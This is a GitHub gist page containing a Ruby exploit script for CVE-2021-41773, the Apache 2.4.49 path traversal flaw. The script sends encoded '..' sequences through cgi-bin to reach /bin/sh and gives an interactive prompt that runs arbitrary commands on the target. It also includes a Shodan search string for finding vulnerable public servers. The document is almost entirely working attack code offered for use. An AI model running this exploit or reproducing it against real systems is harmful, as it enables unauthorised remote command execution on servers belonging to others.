Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Last active February 20, 2023 19:26
Show Gist options
  • Save komodoooo/6124615213e64ebe6170c709c1fad138 to your computer and use it in GitHub Desktop.
Save komodoooo/6124615213e64ebe6170c709c1fad138 to your computer and use it in GitHub Desktop.
CVE-2021-41773 exploit
require 'http'
require 'openssl'
puts """
CVE-2021-41773
Apache 2.4.49 (Unix) RCE Exploit
By komodo\n
"""
=begin
Shodan dork to search vulnerable targets:
"Apache/2.4.49 (Unix)" "HTTP/1.1 200 OK" "2d-432a5e4a73a80"
(Some of these may not be vulnerable by their configuration)
=end
def main(url, cmd)
url.delete_suffix!("/") unless url[-1..-1] != "/"
@ctx = OpenSSL::SSL::SSLContext.new()
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
path = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
payload = "echo Content-Type: text/plain; echo; #{cmd}"
r = HTTP.use({
normalize_uri:{ #https://github.com/httprb/http/wiki/Disabling-URI-Normalization
normalizer:->(uri){HTTP::URI.parse(uri)},
},}).post(url+path, :body=>payload, :ssl_context=>@ctx)
if r.code == 200
puts r.body
else
puts "Not vulnerable! (#{r.code})"
end
end
begin
print "Base URL: "
baseurl = gets.chomp
loop do
print "$ "
main(baseurl, gets.chomp)
end
rescue => err
abort(err.to_s)
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment